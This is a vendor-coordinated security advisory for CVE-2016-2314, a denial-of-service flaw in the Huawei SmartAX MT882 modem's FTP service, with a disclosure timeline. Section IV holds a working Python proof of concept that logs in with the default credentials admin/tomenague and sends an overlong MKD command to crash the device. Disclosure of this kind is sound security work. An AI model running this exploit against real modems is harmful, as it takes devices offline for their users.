Security Advisory: FTP Vulnerability

 

  • Topic: Denial of Service (DoS) vulnerability in Huawei SmartAX MT882 ADSL Modem.
  • Class: Remote DoS.
  • Severity: Medium.
  • Date published: 2016-02-11
  • Date of last update: 2016-02-11
  • CVE number: CVE-2016-2314
  • Credits: Déborah Valeria Higa
  • Affects:
    • Product name: Huawei SmartAX MT882 ADSL Modem.
    • Affected version: V200R002B022 Arg

 

I. Background

Huawei SmartAX MT882 includes a GlobespanVirata ftpd 1.0 (FTP) service at TCP port 21.

 

II. Problem Description

The FTP service fails with the following steps:

  1. Log in with USER and PASS.
  2. Receive response.
  3. Make a directory with MKD and a directory name with 0xFA of length.
  4. Send another command which works with files and directories like CWD, RMD, XRMD, MKD, XMKD and DELE.
  5. Terminate command connection with QUIT.
  6. Receive response.

 

III. Impact

A remote attacker can log in with the default user (admin) and password (tomenague), follow the described steps and cause a DoS, suspending the operation of the device.

 

IV. Supporting Technical Details

Proof of concept:


import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('10.0.0.2', 21))
s.send('USER admin\r\n')
s.send('PASS tomenague\r\n')
print s.recv(4096)
s.send('MKD ' + 'A'*0xFA + '\r\n')
s.send('DMK A\r\n')
s.send('QUIT\r\n')
print s.recv(4096)

 

V. Report Timeline

  • 2015-10-31: contact Huawei Product Security Incident Response Team (PSIRT) to inform them that two vulnerabilities has been found in Huawei SmartAX MT882 ADSL Modem. Send a draft advisory with technical details and PoCs files.
  • 2015-11-01: Huawei PSIRT acknowledges reception of the advisory.
  • 2015-11-11: Huawei PSIRT confirms FTP vulnerability and asks both PoCs and more information about WHIP service.
  • 2015-11-13: send requested information.
  • 2015-11-16: Huawei PSIRT acknowledges.
  • 2015-11-25: Huawei PSIRT informs that the warranty for the MT882 has expired, but confirm that the replacement product MT882a does not have the two vulnerabilities.
  • 2015-11-25: inform that MT882 product is still distributed by Argentina’s ISP Arnet.
  • 2015-11-27: Huawei PSIRT acknowledges.
  • 2016-01-15: request a status update.
  • 2016-01-15: Huawei PSIRT informs that they have contacted Argentina’s front line which have notified to Arnet, but customer didn’t give the result. Argentina’s front line will ask customer again next week.
  • 2016-01-22: Huawei PSIRT informs that Arnet uses HG532s as replacement.
  • 2016-01-23: contact to inform that the investigation is considered closed and asks for confirmation.
  • 2016-01-25: Huawei PSIRT acknowledges.
  • 2016-02-11: Security Advisory published.